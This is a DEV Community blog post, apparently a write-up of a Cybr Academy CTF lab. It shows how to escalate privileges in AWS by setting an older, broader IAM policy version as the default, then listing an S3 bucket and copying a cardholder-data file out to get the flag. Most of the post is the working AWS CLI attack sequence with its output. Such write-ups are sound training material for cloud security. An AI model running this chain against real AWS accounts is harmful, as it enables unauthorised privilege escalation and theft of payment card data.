DEV Community

Cover image for Cybr Academy [lab][CTF] PrivEsc IAM Version Rollback — Exploiting Version Management to Access S3 Data (AWS Red Teaming)
David Disu
David Disu

Posted on

Cybr Academy [lab][CTF] PrivEsc IAM Version Rollback — Exploiting Version Management to Access S3 Data (AWS Red Teaming)

Overview

lab description
This lab demonstrates a real-world AWS misconfiguration where an attacker can abuse IAM policy version management to escalate privileges and exfiltrate sensitive data from S3. The attack chain: enumerate IAM policy versions → identify an overly permissive version → set it as default → access S3 → exfiltrate cardholder data.

Services abused: IAM, S3

Key permissions exploited: iam:GetPolicyVersion, iam:SetDefaultPolicyVersion


How AWS IAM Policy Versioning Works

AWS IAM managed policies support up to five versions. When a policy is updated, the old version is retained rather than deleted. Only one version is active at a time — this is the default version. The key insight for attackers: if a principal has iam:SetDefaultPolicyVersion, they can roll back to any previous version, including ones with broader permissions than the current default.

This is exactly the misconfiguration we will exploit.


Reconnaissance

Step 1 — Confirm identity and current permissions

Always start by confirming what credential you are operating with:

aws sts get-caller-identity
Enter fullscreen mode Exit fullscreen mode

Step 2 — Enumerate policy versions

The current default policy (v1) grants List* and Get* on all IAM actions, plus crucially iam:SetDefaultPolicyVersion. This is enough to enumerate and roll back to any prior version.

List all available versions of the target policy:

aws iam list-policy-versions \
  --policy-arn arn:aws:iam::014498641618:policy/policyforexploitableuser
Enter fullscreen mode Exit fullscreen mode

Step 3 — Inspect each version

Inspect each version to identify which one grants the most useful permissions. Version 4 stands out:

aws iam get-policy-version \
  --policy-arn arn:aws:iam::014498641618:policy/policyforexploitableuser \
  --version-id v4
Enter fullscreen mode Exit fullscreen mode

Output:

{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Action": [
                        "s3:List*",
                        "s3:Get*"
                    ],
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v4",
        "IsDefaultVersion": false,
        "CreateDate": "2026-07-15T18:13:34+00:00"
    }
}
Enter fullscreen mode Exit fullscreen mode

Version 4 grants s3:List* and s3:Get* across all resources — full read access to every S3 bucket in the account. This is our target.


Exploitation

Step 4 — Set v4 as the default policy version

aws iam set-default-policy-version \
  --policy-arn arn:aws:iam::014498641618:policy/policyforexploitableuser \
  --version-id v4
Enter fullscreen mode Exit fullscreen mode

No output means it succeeded. Our credential now has full S3 read access.

Step 5 — Enumerate S3 buckets

aws s3 ls
Enter fullscreen mode Exit fullscreen mode

Step 6 — List bucket contents

aws s3 ls s3://iamrollback-cardholder-data-bucket-014498641618
Enter fullscreen mode Exit fullscreen mode

A file named cardholder_data_primary.csv is present — this is the target.

Step 7 — Exfiltrate the data

aws s3 cp s3://iamrollback-cardholder-data-bucket-014498641618/cardholder_data_primary.csv .
Enter fullscreen mode Exit fullscreen mode

Open the file to retrieve the flag.

PWNSOME REFERENCES

Top comments (0)